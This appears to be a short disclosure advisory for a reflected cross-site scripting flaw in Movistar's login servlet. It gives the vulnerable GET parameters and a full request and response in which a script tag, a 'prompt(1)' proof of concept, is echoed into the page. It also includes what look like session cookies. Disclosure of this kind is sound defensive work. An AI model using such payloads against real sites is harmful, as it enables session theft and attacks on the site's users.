2018-005: Cross Site Scripting (XSS Reflected)in Movistar

The vulnerable parameters are "xxxtipouserxxx", "xxxuserxxx" and "xxxpasswordxxx", and the exploitation is through GET method. Example:

-- REQUEST:

GET /sr/sso/pub/servlet/login?tipoUs=P&xxxtypeUserxxx=titular&xxxmethodxxx=post&xxxurixxx=https%3A%2F%2Fwww.movistar.es%2Fmimovistar-cliente%2Fes-es%2Fparticulares%2FpostLogin.html&xxxuserxxx=123456789&xxxpasswordxxx=aSD1231&xxxtipouserxxx=P"> HTTP/1.1

Host: www.movistar.es

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://www.movistar.es/mimovistar-cliente/es-es/particulares/login.html?ccliTokenSS=164adac9f5a559

Cookie: utag_main=v_id:0163bd2d2ba00013f7057242907404044007100900bd0$_sn:3$_ss:0$_st:1531923930124$_pn:24%3Bexp-session$ses_id:1531921591410%3Bexp-session; CSI_clicks_acum_particulares=0; TLTSID=fs2id47fzyq1527887245416; CSI_ultima_particulares=1527887249216; CSI_url_inicio_particulares=/t5/Ayuda-Gestiones-Contratos-y-Factura-Internet/dynamicip-rima-tde-net/td-p/3086562; CSI_page_name_inicio_particulares=comunidad%3Aportada%3Aforos%3Ainternet%3Aayuda-tarifas%3A.dynamicip.rima-tde.net; _ga=GA1.2.370576869.1527887249; JSESSIONID=tvN0bP2Lz7Vb8LY6h3mN2h2621vNFvnrxvfBh7wY2xXY7lVwT0dS!905856882; 7a5f68f5df444a4f87157280100000f7=en; USER_CLASS=519150693; COL=18071809964270AHOGes00002018071877777; SEG_NAV=particulares; SEG_NAV_ES=particulares; MI_MOVISTAR=NABAGNLNN; _gid=GA1.2.168189848.1531917965; __utma=151739813.370576869.1527887249.1531917965.1531921565.2; __utmc=151739813; __utmz=151739813.1531921565.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __mc=-4526385577924454000; _mc_uuid=118218df-d4ed-47d1-ad5c-57dda7321439; _mc_sessorigin=seo; _mc_sessid=1531917965470; IC_XCOL=; IC_XCOL_1=; gwIsp_i3=mov; gwIsp_i3_d=mov; optimizelyEndUserId=oeu1531917967732r0.5122833511510013; optimizelySegments=%7B%7D; optimizelyBuckets=%7B%7D; compruebaCkE=1; TS866899=e7efedca1d13dfc670d7bd1158242e7aadf07615246704f85b4f449b; check=true; mbox=PC#56aaa47249c843fd84f693af4a3ecfb8.26_16#1595162840|session#3e5366681fb742b7aec35779677e69bf#1531923989; gwIsp=mov; __utmb=151739813.4.9.1531921718694; woid=19d4d5c4-2028-97a7-9ea6-940257cd65f0; CCLIJSESSIONID=sf1zbPGXdf0Tp9bmD77RTf7ndJhpNpj2lzylJ0ztVvV3JS2KG4K2!-624340416; AMP_TOKEN=%24NOT_FOUND; _gat_tealium_0=1; _gat=1

-- RESPONSE:

HTTP/1.1 200 OK

Server: XXXXXX

Content-Length: 2920

X-ORACLE-DMS-ECID: 3cfcdc11-88a2-4d98-bb23-b5f86b7a6d30-00b80194

X-ORACLE-DMS-RID: 0

Content-Type: text/html; charset=ISO-8859-1

Connection: close

<input name="xxxtipouserxxx" value="P"><script>prompt(1)</script>" type="hidden">